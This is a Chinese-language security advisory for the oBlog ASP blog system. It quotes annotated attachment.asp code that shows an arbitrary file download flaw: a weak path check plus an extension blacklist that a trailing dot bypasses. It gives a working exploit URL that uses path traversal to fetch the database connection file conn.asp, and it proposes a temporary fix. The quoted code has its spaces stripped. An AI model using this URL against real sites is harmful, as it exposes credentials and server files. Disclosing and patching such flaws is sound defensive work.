Path=Trim(Request("path"))'获取用户提交的路径

FileID=Trim(Request("FileID"))

IfFileID=""AndPath=""Then

Response.Write"参数不足"

Response.End

EndIf

...

IfCheckDownLoadOr1=1Then

IfPath=""Then

setrs=Server.CreateObject("ADODB.RecordSet")

link_database

SQL=("selectfile_path,userid,file_ext,ViewNumFROMoblog_upfileWHEREFileID="&CLng(FileID))

rs.opensql,conn,1,3

IfNotrs.EofThen

uid=rs(1)

file_ext=rs(2)

rs("ViewNum")=rs("ViewNum")+1

rs.Update

downloadFileServer.MapPath(rs(0)),0

Else

Response.Status=404

Response.Write"该附件不存在!"

EndIf

rs.Close

Setrs=Nothing

Else

IfInStr(path,Oblog.CacheConfig(56))>0Then'Tr4c3标注：注意这里，仅仅判断用户提交的路径是否包含UploadFiles，为真则调用downloadfile函数下载文件

downloadFileServer.MapPath(Path),1

Endif

EndIf

Else

'如果附件为图片的话，当权限检验无法通过则调用一默认图片，防止<img>标记无法调用，影响显示效果

IfPath=""Then

Response.Status=403

Response.WriteShowDownErr

Response.End

Else

downloadFileServer.MapPath(blogdir&"images/oblog_powered.gif"),1

Endif

Endif

Setoblog=Nothing

SubdownloadFile(strFile,stype)

OnErrorResumeNext

Server.ScriptTimeOut=9999999

DimS,fso,f,intFilelength,strFilename

strFilename=strFile

Response.Clear

Sets=Server.CreateObject(oblog.CacheCompont(2))

s.Open

s.Type=1

Setfso=Server.CreateObject(oblog.CacheCompont(1))

IfNotfso.FileExists(strFilename)Then

Ifstype=0Then

Response.Status=404

Response.Write"该附件已经被删除!"

ExitSub

Else

strFilename=Server.MapPath(blogdir&"images/nopic.gif")

Endif

EndIf

Setf=fso.GetFile(strFilename)

intFilelength=f.size

s.LoadFromFile(strFilename)

IfErrThen

Response.Write("<h1>错误:</h1>"&Err.Description&"<p>")

Response.End

EndIf

Setfso=Nothing

DimData

Data=s.Read

s.Close

Sets=Nothing

DimContentType

selectCaseLCase(Right(strFile,4))

Case".asp",".mdb",".config",".js"'Tr4c3标注：再看这里，想起来什么来了？对了，前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com/post/306.html]，利用方法也相似，神奇的"."又派上用场了。

ExitSub

Case".asf"

ContentType="video/x-ms-asf"

Case".avi"

ContentType="video/avi"

Case".doc"

ContentType="application/msword"

Case".zip"

ContentType="application/zip"

Case".xls"

ContentType="application/vnd.ms-excel"

Case".gif"

ContentType="image/gif"

Case".jpg","jpeg"

ContentType="image/jpeg"

Case".wav"

ContentType="audio/wav"

Case".mp3"

ContentType="audio/mpeg3"

Case".mpg","mpeg"

ContentType="video/mpeg"

Case".rtf"

ContentType="application/rtf"

Case".htm","html"

ContentType="text/html"

Case".txt"

ContentType="text/plain"

CaseElse

ContentType="application/octet-stream"

Endselect

IfResponse.IsClientConnectedThen

IfNot(InStr(LCase(f.name),".gif")>0OrInStr(LCase(f.name),".jpg")>0OrInStr(LCase(f.name),".jpeg")>0OrInStr(LCase(f.name),".bmp")>0OrInStr(LCase(f.name),".png")>0)Then

Response.AddHeader"Content-Disposition","attachment;filename="&f.name

EndIf

Response.AddHeader"Content-Length",intFilelength

Response.CharSet="UTF-8"

Response.ContentType=ContentType

Response.BinaryWriteData

Response.Flush

Response.Clear()

EndIf

EndSub

<*参考:

Tr4c3[at]126[dot]com

*>

测试方法:

[警告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

########################################################################

利用方法：

http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.

########################################################################

建议:

修补建议：

等待官方发布新的补丁程序。

########################################################################

临时解决办法：

将attachment.asp第5行Path=Trim(Request(”path”))改成Path=Replace(Trim(Request(”path”)),”..”,”")

########################################################################